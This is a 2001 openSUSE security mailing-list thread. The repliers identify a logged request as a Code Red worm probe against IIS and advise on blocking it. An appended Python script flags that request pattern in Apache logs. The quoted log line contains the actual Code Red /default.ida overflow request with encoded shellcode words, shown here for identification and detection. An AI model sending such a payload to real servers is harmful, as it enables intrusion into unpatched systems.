Mailinglist Archive: opensuse-security (670 mails)
Re: [suse-security] strage log entry
- From: Sven Michels <smichels@xxxxxxxxxxxx>
- Date: Tue, 13 Nov 2001 10:52:59 +0100
- Message-id: <3BF0ED7A.B3501337@xxxxxxxxxxxx>
Marcus Birkin wrote:
>
> Hi
>
> That's Code Red or Nimda, I forget which one..
> This is only a problem if you're running IIS ;)
Code Red (Original Version).
> > I found this in my access_log file. What are they looking for? Is this an
> > attack?
> >
> > 211.90.239.179 - - [12/Nov/2001:18:21:16 +0100] "GET
> >
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> >
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> >
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> >
> NNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> > u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0"
> > 400 329
> >
> > I put this IP in my host.deny file. Is this enough?
nafaik, httpd doesn't look at it. deny it via ipchains/iptables
but you don't need to do that (because it's an attack on IIS).
--
intraDAT AG http://www.intradat.com
Wilhelm-Leuschner-Strasse 7 Tel: +49 69-25629-0
D - 60329 Frankfurt am Main Fax: +49 69-25629-256
Junk mail is war. RFCs do not apply.
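
Added example, not part of the original thread: a small Python scan of an Apache access_log for the request shape quoted above (`/default.ida?`, a long run of one filler character, then `%uXXXX` words), grouped by source address together with the status the server returned. The sample lines, the documentation-range IPs and the length thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')
# Request shape from the quoted log entry. Thresholds are assumptions:
# at least 100 repeats of one filler character, then two or more %uXXXX words.
PROBE = re.compile(r'^GET /default\.ida\?(.)\1{99,}(?:%u[0-9a-f]{4}){2,}', re.I)

def scan(lines):
    """Return {source_ip: [(timestamp, status), ...]} for matching requests."""
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue  # not a Common Log Format record, skip it
        host, when, request, status, _size = m.groups()
        if PROBE.match(request):
            hits[host].append((when, int(status)))
    return dict(hits)

def answered_2xx(hits):
    """Sources whose probe got a 2xx reply; on a non-IIS server that is
    unexpected and worth a closer look at how .ida URLs are being handled."""
    return sorted(h for h, evs in hits.items()
                  if any(200 <= s < 300 for _, s in evs))

# Constructed sample data (not taken from a real log).
_PAD = "N" * 224 + "%u9090" * 4 + "=a"
SAMPLE = [
    '203.0.113.5 - - [12/Nov/2001:18:21:16 +0100] '
    '"GET /default.ida?%s HTTP/1.0" 400 329' % _PAD,
    '203.0.113.5 - - [12/Nov/2001:19:02:40 +0100] '
    '"GET /default.ida?%s HTTP/1.0" 400 329' % _PAD,
    '198.51.100.9 - - [12/Nov/2001:18:22:01 +0100] '
    '"GET /index.html HTTP/1.0" 200 1043',
    '198.51.100.9 - - [12/Nov/2001:18:22:05 +0100] '
    '"GET /default.ida?x=1 HTTP/1.0" 404 210',
]

if __name__ == "__main__":
    found = scan(SAMPLE)
    for host, events in sorted(found.items()):
        codes = sorted({s for _, s in events})
        print(f"{host}: {len(events)} probe(s), status codes {codes}")
    print("2xx replies to probes from:", answered_2xx(found) or "none")
```
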